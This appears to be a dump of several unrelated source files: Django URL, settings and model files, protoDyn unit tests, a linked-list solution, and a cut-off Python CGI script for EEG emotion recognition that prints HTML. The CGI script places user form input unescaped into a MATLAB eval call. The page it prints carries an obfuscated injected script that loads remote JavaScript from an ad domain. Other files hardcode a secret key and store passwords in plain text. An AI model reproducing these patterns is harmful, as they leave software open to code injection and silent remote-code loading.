69c5f69164eed21cf0ed953345f5fed4d702daf5 | 1633258aff76252b660534eae6d70a9e95a468ec | /cost_management/urls.py | 4443c8d4c8e5ca1952519e7048671ed5a7cfe38d | [] | no_license | kxplorer/banglai-django | 7077117f66128cb2bbaa8d50c1a28c076b303987 | 0d764f744ef165b078e856eb9374dba93cb614e8 | refs/heads/master | 2021-09-24T20:27:14.726832 | 2018-09-16T08:50:42 | 2018-09-16T08:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | from django.urls import path
from . import views
urlpatterns = [
path('list/', views.my_expense, name='cost-list'),
path('add/', views.add_expense, name='add-expense'),
path('edit/<int:expense_id>/', views.edit_expense, name='edit-expense'),
path('delete/<int:expense_id>/', views.delete_expense, name='delete-expense'),
]
| [
"harun1393@gmail.com"
] | harun1393@gmail.com |
283e56d68b23561dbee0a7d3cdbf52dab4597543 | aebb9e6f6de07d6dbfd51c271aad8f783afbf698 | /gpuPriceCheckerDjango/settings.py | 397cf32e1369eb608a2b12993fed91d4d74bb33f | [] | no_license | honzikv/gpuPriceCheckerDjango | c435869cf0f643fe3f08667917567695787d2753 | 93f3385b51e2044a0d19de81c9985212a3416f9c | refs/heads/master | 2023-07-25T18:24:34.184445 | 2021-09-07T20:03:15 | 2021-09-07T20:03:15 | 404,087,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,315 | py | """
Django settings for gpuPriceCheckerDjango project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before any real deployment.
SECRET_KEY = 'django-insecure-51$zz-a$-$^=40^1ev_i4fqh3c)1k2lw(96j5hi%-rf%=fxj23'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'gpuPriceCheckerDjango.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level template directory in addition to per-app templates.
        'DIRS': [BASE_DIR / 'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'gpuPriceCheckerDjango.wsgi.application'


# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}


# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/

STATIC_URL = '/static/'

# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field

DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
"honzikv@students.zcu.cz"
] | honzikv@students.zcu.cz |
ee8c7d6f381dd505987844fcbbda21733eff0e8a | 3788b8015de66deeadce4080fdd151bde2bcd974 | /backend/articles/models.py | 812e41764697a32f14595c79df6bf9265bcf8cd4 | [] | no_license | qsoo/GNM | d050d9c50fd03027006c7b8ff2e4d654cd899a46 | 754b5bb3f4eb56de01739080163462cc825f2221 | refs/heads/master | 2023-05-26T12:42:43.355249 | 2021-06-17T02:32:44 | 2021-06-17T02:32:44 | 357,010,293 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | from django.db import models
# Create your models here.
class Guestbook(models.Model):
    """A guestbook entry left by a visitor: nickname, short comment, optional
    image URL, and a password authorizing later edits/deletes."""
    user_nickname = models.CharField(max_length=15)
    guestbook_comment = models.CharField(max_length=144)
    # NOTE(review): stored as plain text, not hashed — confirm this is
    # acceptable for the app's threat model.
    guestbook_password = models.CharField(max_length=20)
    guestbook_image = models.CharField(max_length=500 ,null=True, blank=True)
    created_date = models.DateTimeField(auto_now_add=True)
    updated_date = models.DateTimeField(auto_now=True)
"dryans@naver.com"
] | dryans@naver.com |
6e820f78ab2c3d468a74928b2b66659a395bac47 | cbe5195efc63d62220bcb95211ce802d988ff0ee | /test_protoDyn.py | f9ff44bbb74b1fd7e4dab96ad0dcbf6807f273aa | [] | no_license | wgilpin/shout | 6d68d357fc96efa38653c08b350a17c85a449cd3 | 1146587305fa4113142eb87f3401b22d8ec18c7a | refs/heads/master | 2020-03-22T03:53:15.921141 | 2018-07-02T15:10:02 | 2018-07-02T15:10:02 | 139,458,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,065 | py | from unittest import TestCase
from protoDyn import protoDyn
__author__ = 'Will'
# Prototype schema shared by the tests: field1 is explicitly required,
# field2 explicitly optional, field3 has no 'required' key (the missing-
# required test below expects it to default to required).
testProto = [
    {"name": "field1",
     "required": True,
     "no": 1},
    {"name": "field2",
     "required": False,
     "no": 2},
    {"name": "field3",
     "no": 3},
]
class TestProtoDyn(TestCase):
    """Unit tests for protoDyn: field validation and webapp2 request ingestion."""

    def test_validate_all_present(self):
        """Setting every field (required and optional) validates cleanly."""
        proto = protoDyn(testProto)
        proto['field1'] = "value1"
        proto['field2'] = "value2"
        proto['field3'] = "value3"
        valid, errors = proto.validate()
        self.assertEqual(valid, True, "Should be valid")
        self.assertEqual(errors, [], "Should be no errors")

    def test_validate_missing_required(self):
        """Omitting field3 (no 'required' key -> treated as required) fails."""
        proto = protoDyn(testProto)
        proto['field1'] = "value1"
        proto['field2'] = "value2"
        valid, errors = proto.validate()
        self.assertEqual(valid, False, "Should be invalid")
        self.assertNotEqual(errors, [], "Should be errors")

    def test_validate_missing_optional(self):
        """Omitting field2 (required=False) still validates cleanly."""
        proto = protoDyn(testProto)
        proto['field1'] = "value1"
        proto['field3'] = "value3"
        valid, errors = proto.validate()
        self.assertEqual(valid, True, "Should be valid")
        self.assertEqual(errors, [], "Should be no errors")

    def test_invalid_field(self):
        """Assigning to an undeclared field must raise AttributeError."""
        proto = protoDyn(testProto)
        try:
            proto['field4'] = "value1"
            self.fail("field4 is not a field")
        except AttributeError:
            pass

    def test_open_webapp2_request(self):
        """open_webapp2_request copies request.params values into the proto."""
        class FakeRequest():
            # Minimal stand-in for a webapp2 request: only .params is read.
            params = None
            def __init__(self, params):
                self.params = params
        request = FakeRequest({
            "field1": "value1",
            "field2": "value2",
            "field3": "value3",
        })
        proto = protoDyn(testProto)
        self.assertTrue(proto.open_webapp2_request(request), "failed to validate")
        self.assertEqual(proto['field1'], 'value1')
        self.assertEqual(proto['field2'], 'value2')
        self.assertEqual(proto['field3'], 'value3')
| [
"wgilpin@gmail.com"
] | wgilpin@gmail.com |
cb0abb7803753d6eb75cdac081833a6020167949 | 821f403a3afc9055d40893eca033c369a4c3831e | /Easy/No206.py | c2200da24597a13f4e107a7fd6caac6856ee93e2 | [] | no_license | kikihiter/LeetCode2 | 29f91b6992a01ba23e7da04b2b2c862410cc563b | 7167f1a7c6cb16cca63675c80037682752ee2a7d | refs/heads/master | 2023-05-01T03:45:44.482932 | 2021-05-19T13:12:16 | 2021-05-19T13:12:16 | 277,283,525 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def reverseList(self, head):
        """Reverse a singly linked list iteratively and return the new head.

        :type head: ListNode
        :rtype: ListNode
        """
        prev = None  # already-reversed prefix (starts empty)
        node = head
        while node is not None:
            # Redirect the current node into the reversed prefix and advance.
            node.next, prev, node = prev, node, node.next
        return prev
"noreply@github.com"
] | noreply@github.com |
6c1124e32f0b834747f296c146061b0728d51d69 | 408a9f48c8914c7932dcd9aac8dd0fdaca555474 | /Web App/cgi-bin/predict.py | 168b887433047c9eb66b0360fa369da55e13560b | [] | no_license | redyjq/Significant-Preprocessing-Method-In-EEG-Based-Emotion-Classification | 1ec99e50fdfd00d316309f7d3159ff7d4da377ea | bbbc094a84395071cf52c461e4d04c33bf2676c5 | refs/heads/master | 2020-05-07T18:30:46.826749 | 2016-02-17T14:14:00 | 2016-02-17T14:14:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86,006 | py | #!/usr/bin/env python
# Import modules for CGI handling
import cgi, cgitb
import matlab.engine
print "Content-type: text/html\n"
# Create instance of FieldStorage
form = cgi.FieldStorage()
# Get data from fields
file_input = form.getvalue('file_input')
preprocessing_method = form.getvalue('preprocessing_method')
classification_method = form.getvalue('classification_method')
function_path = 'D:/TUGAS AKHIR/Progress/SIDANG/Source Code/Classification'
file_input = 'D:/TUGAS AKHIR/Progress/SIDANG/DEMO/' + file_input
# Create matlab file
eng = matlab.engine.start_matlab()
# Call matlab function
eng.eval("cd '"+function_path+"';",nargout=0)
eng.eval("[valence,arousal] = getPrediction('"+file_input+"','"+preprocessing_method+"','"+classification_method+"');",nargout=0)
valence = eng.workspace["valence"]
arousal = eng.workspace["arousal"]
# Translate the numeric predictions returned by MATLAB into the HTML
# snippets (image plus caption) embedded in the "Prediction Result" tab
# below. The classifier encodes "high" as 3.0; anything else reads as "low".
if valence != 3.0:
	strValence = '''<img src="../img/class/lv.png" width="100%">
							<h4 class="text-center">Low Valence</h4>'''
else:
	strValence = '''<img src="../img/class/hv.png" width="100%">
							<h4 class="text-center">High Valence</h4>'''
if arousal != 3.0:
	strArousal = '''<img src="../img/class/la.png" width="100%">
							<h4 class="text-center">Low Arousal</h4>'''
else:
	strArousal = '''<img src="../img/class/ha.png" width="100%">
							<h4 class="text-center">High Arousal</h4>'''
# Map the (valence, arousal) pair onto one of the four emotion quadrants.
# NOTE: deliberately no trailing else, mirroring the original behaviour —
# an unexpected pair leaves strClass undefined.
quadrant = (valence, arousal)
if quadrant == (1.0, 3.0):
	strClass = '''<img src="../img/class/halv.png" width="100%">
						<h4 class="text-center">Class 1</h4>'''
elif quadrant == (3.0, 3.0):
	strClass = '''<img src="../img/class/hahv.png" width="100%">
						<h4 class="text-center">Class 2</h4>'''
elif quadrant == (3.0, 1.0):
	strClass = '''<img src="../img/class/lahv.png" width="100%">
						<h4 class="text-center">Class 3</h4>'''
elif quadrant == (1.0, 1.0):
	strClass = '''<img src="../img/class/lalv.png" width="100%">
						<h4 class="text-center">Class 4</h4>'''
# FFT-only pipeline: render the result page with tabs for the Emotiv channel
# map, the per-channel raw-data plots, the five FFT frequency-band plots
# (Delta..Gamma, image files presumably regenerated by the MATLAB step —
# TODO confirm), and the prediction images built above
# (strValence/strArousal/strClass are spliced into the HTML literal).
# NOTE(review): this markup is duplicated across the four method branches —
# candidate for a shared template (behaviour unchanged here).
if preprocessing_method=='fft':
	print '''<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>EEG Emotion Recognition</title>
    <!-- Bootstrap Core CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
    <!-- MetisMenu CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
    <!-- Timeline CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
    <!-- Custom CSS -->
    <link href="../css/dashboard.css" rel="stylesheet">
    <!-- Morris Charts CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
    <!-- Custom Fonts -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>
<body>
    <div id="wrapper">
        <div id="page-wrapper">
            <div class="row">
                <div class="col-lg-12">
                    <a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
            <div class="row">
                <div class="col-lg-12">
                    <div class="panel panel-info">
                        <div class="panel-body">
                            <!-- Nav tabs -->
                            <ul class="nav nav-tabs">
                                <li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
                                </li>
                                <li><a href="#raw-data" data-toggle="tab">Raw Data</a>
                                </li>
                                <li><a href="#fast-fourier-transformation" data-toggle="tab">Fast Fourier Transformation</a>
                                </li>
                                <li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
                                </li>
                            </ul>
                            <!-- Tab panes -->
                            <div class="tab-content">
                                <div class="tab-pane fade in active" id="emotiv-channels">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-4">
                                            <img src="../img/emotiv_channel.png" width="100%">
                                            <h4 class="text-center">Emotiv Channels</h4>
                                        </div>
                                        <div class="col-lg-4"></div>
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="raw-data">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/1.png" width="100%">
                                            <h4 class="text-center">AF3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/2.png" width="100%">
                                            <h4 class="text-center">F7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/3.png" width="100%">
                                            <h4 class="text-center">F3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/4.png" width="100%">
                                            <h4 class="text-center">FC5</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/5.png" width="100%">
                                            <h4 class="text-center">T7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/6.png" width="100%">
                                            <h4 class="text-center">P7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/7.png" width="100%">
                                            <h4 class="text-center">O1</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/8.png" width="100%">
                                            <h4 class="text-center">O2</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/9.png" width="100%">
                                            <h4 class="text-center">P8</h4>
                                        </div>
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/10.png" width="100%">
                                            <h4 class="text-center">T8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/11.png" width="100%">
                                            <h4 class="text-center">FC6</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/12.png" width="100%">
                                            <h4 class="text-center">F4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/13.png" width="100%">
                                            <h4 class="text-center">F8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4"></div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/14.png" width="100%">
                                            <h4 class="text-center">AF4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="fast-fourier-transformation">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/delta.png" width="100%" height="200px">
                                            <h4 class="text-center">Delta</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/theta.png" width="100%" height="200px">
                                            <h4 class="text-center">Theta</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/alpha.png" width="100%" height="200px">
                                            <h4 class="text-center">Alpha</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/beta.png" width="100%" height="200px">
                                            <h4 class="text-center">Beta</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/gamma.png" width="100%" height="200px">
                                            <h4 class="text-center">Gamma</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="prediction-result">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-2"></div>
                                        <div class="col-lg-2">'''+strValence+'''</div>
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-2">'''+strArousal+'''</div>
                                        <div class="col-lg-2"></div>
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-4">'''+strClass+'''</div>
                                        <div class="col-lg-4"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- /.panel-body -->
                    </div>
                    <!-- /.panel -->
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
        </div>
        <!-- /#page-wrapper -->
    </div>
    <!-- /#wrapper -->
    <!-- jQuery -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
    <!-- Bootstrap Core JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
    <!-- Metis Menu Plugin JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
    <!-- Morris Charts JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
    <!-- Custom Theme JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>'''
# ICA+FFT pipeline: same result page as the 'fft' branch plus an extra
# "Independent Component Analysis" tab showing the 14 ICA plots
# (../img/ica/1..14.png, presumably regenerated by the MATLAB step — TODO
# confirm). The prediction tab embeds strValence/strArousal/strClass built
# above.
if preprocessing_method=='ica_fft':
	print '''<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>EEG Emotion Recognition</title>
    <!-- Bootstrap Core CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
    <!-- MetisMenu CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
    <!-- Timeline CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
    <!-- Custom CSS -->
    <link href="../css/dashboard.css" rel="stylesheet">
    <!-- Morris Charts CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
    <!-- Custom Fonts -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>
<body>
    <div id="wrapper">
        <div id="page-wrapper">
            <div class="row">
                <div class="col-lg-12">
                    <a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
            <div class="row">
                <div class="col-lg-12">
                    <div class="panel panel-info">
                        <div class="panel-body">
                            <!-- Nav tabs -->
                            <ul class="nav nav-tabs">
                                <li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
                                </li>
                                <li><a href="#raw-data" data-toggle="tab">Raw Data</a>
                                </li>
                                <li><a href="#independent-component-analysis" data-toggle="tab">Independent Component Analysis</a>
                                </li>
                                <li><a href="#fast-fourier-transformation" data-toggle="tab">Fast Fourier Transformation</a>
                                </li>
                                <li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
                                </li>
                            </ul>
                            <!-- Tab panes -->
                            <div class="tab-content">
                                <div class="tab-pane fade in active" id="emotiv-channels">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-4">
                                            <img src="../img/emotiv_channel.png" width="100%">
                                            <h4 class="text-center">Emotiv Channels</h4>
                                        </div>
                                        <div class="col-lg-4"></div>
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="raw-data">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/1.png" width="100%">
                                            <h4 class="text-center">AF3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/2.png" width="100%">
                                            <h4 class="text-center">F7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/3.png" width="100%">
                                            <h4 class="text-center">F3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/4.png" width="100%">
                                            <h4 class="text-center">FC5</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/5.png" width="100%">
                                            <h4 class="text-center">T7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/6.png" width="100%">
                                            <h4 class="text-center">P7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/7.png" width="100%">
                                            <h4 class="text-center">O1</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/8.png" width="100%">
                                            <h4 class="text-center">O2</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/9.png" width="100%">
                                            <h4 class="text-center">P8</h4>
                                        </div>
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/10.png" width="100%">
                                            <h4 class="text-center">T8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/11.png" width="100%">
                                            <h4 class="text-center">FC6</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/12.png" width="100%">
                                            <h4 class="text-center">F4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/13.png" width="100%">
                                            <h4 class="text-center">F8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4"></div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/14.png" width="100%">
                                            <h4 class="text-center">AF4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="independent-component-analysis">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/ica/1.png" width="100%">
                                            <h4 class="text-center">AF3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/2.png" width="100%">
                                            <h4 class="text-center">F7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/3.png" width="100%">
                                            <h4 class="text-center">F3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
